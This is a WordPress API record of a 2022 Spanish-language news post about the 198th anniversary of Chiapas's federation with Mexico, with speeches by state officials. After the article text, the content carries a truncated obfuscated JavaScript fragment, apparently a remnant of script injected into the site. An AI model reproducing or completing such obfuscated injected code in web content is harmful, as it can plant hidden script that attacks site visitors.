{"id":5130,"date":"2022-09-15T01:46:05","date_gmt":"2022-09-15T01:46:05","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=5130"},"modified":"2022-09-15T01:46:06","modified_gmt":"2022-09-15T01:46:06","slug":"federacion-de-chiapas-a-mexico-parte-de-nuestra-identidad-nacional-trejo-huerta","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=5130","title":{"rendered":"Federaci\u00f3n de Chiapas a M\u00e9xico, parte de nuestra identidad nacional: Trejo Huerta"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220914-WA0076.jpg\" alt=\"\" class=\"wp-image-5131\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220914-WA0076.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220914-WA0076-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220914-WA0076-768x512.jpg 768w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u2022 Presidenta del Congreso particip\u00f3 en la Conmemoraci\u00f3n del 198 Aniversario de la Federaci\u00f3n de Chiapas a M\u00e9xico.<\/p>\n\n\n\n<p>Tuxtla Guti\u00e9rrez Chiapas a 14 de septiembre de 2022.- En magno evento, la diputada Mar\u00eda De los \u00c1ngeles Trejo Huerta presidenta del Congreso del Estado recibi\u00f3 de manos del gobernador Rutilio Escand\u00f3n Cadenas el bando solemne como s\u00edmbolo de la Federaci\u00f3n de Chiapas a M\u00e9xico.Lo anterior, como parte de la Conmemoraci\u00f3n del CXCVIII Aniversario de la Federaci\u00f3n de Chiapas a M\u00e9xico, evento en el que la l\u00edder del congreso local acompa\u00f1\u00f3 al titular del Poder Ejecutivo y en el que estuvieron presentes el presidente del Poder Judicial, Guillermo Ramos P\u00e9rez, autoridades civiles y militares y gabinete legal ampliado.Conmemorar el 198 aniversario de la Federaci\u00f3n de Chiapas a M\u00e9xico, sostuvo la diputada Trejo Huerta, es recordar un hito hist\u00f3rico que va acompa\u00f1ado de identidad nacional, representaci\u00f3n cultural y remembranza, de todos los valores que como mexicanos nos representan ante el mundo.Hoy por hoy, como servidores p\u00fablico -se\u00f1al\u00f3 la Legisladora- debemos ser garantes de nuestro patriotismo, de la democracia y de nuestra soberan\u00eda nacional, sinti\u00e9ndonos orgullosos de nuestro pa\u00eds y de nuestro Estado.Chiapas, es referente de inclusi\u00f3n, de expresi\u00f3n cultural, de protecci\u00f3n de los derechos humanos y precursores del federalismo, el constitucionalismo y de nuestro amor a la patria.En este evento conmemorativo, el gobernador Rutilio Escand\u00f3n Cadenas dijo que hace 198 a\u00f1os se tom\u00f3 la decisi\u00f3n de unirnos a nuestra gran naci\u00f3n mexicana. El 14 de septiembre, un d\u00eda como hoy del 1824. Y fue una gran decisi\u00f3n realizada de manera voluntaria por el pueblo de Chiapas.\u201cFormalmente es el primer plebiscito realizado en nuestro pa\u00eds. Es lo que somos, un pueblo democr\u00e1tico y amante de la paz. Desde esa memorable fecha, cambi\u00f3 el rostro geopol\u00edtico de M\u00e9xico.\u201dPor su parte, el Presidente del Poder Judicial Guillermo Ramos P\u00e9rez sostuvo que:\u201cLos ciudadanos de hoy y nuestros gobiernos Federal y estatal, son ejemplos de estado democr\u00e1tico, respetuosos de la voluntad popular que trabajan cercanos a la gente con el compromiso de transformar la vida p\u00fablica de nuestro pa\u00eds.\u201d<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u2022 Presidenta del Congreso particip\u00f3 en la Conmemoraci\u00f3n del 198 Aniversario de la Federaci\u00f3n de Chiapas a M\u00e9xico. Tuxtla Guti\u00e9rrez Chiapas a 14 de septiembre de 2022.- En magno evento, la diputada Mar\u00eda De los \u00c1ngeles Trejo Huerta presidenta del Congreso del Estado recibi\u00f3 de manos del gobernador Rutilio Escand\u00f3n Cadenas el bando solemne como &hellip;<\/p>\n","protected":false},"author":2,"featured_media":5131,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-5130","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5130","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5130"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5130\/revisions"}],"predecessor-version":[{"id":5132,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5130\/revisions\/5132"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/5131"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5130"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5130"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5130"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}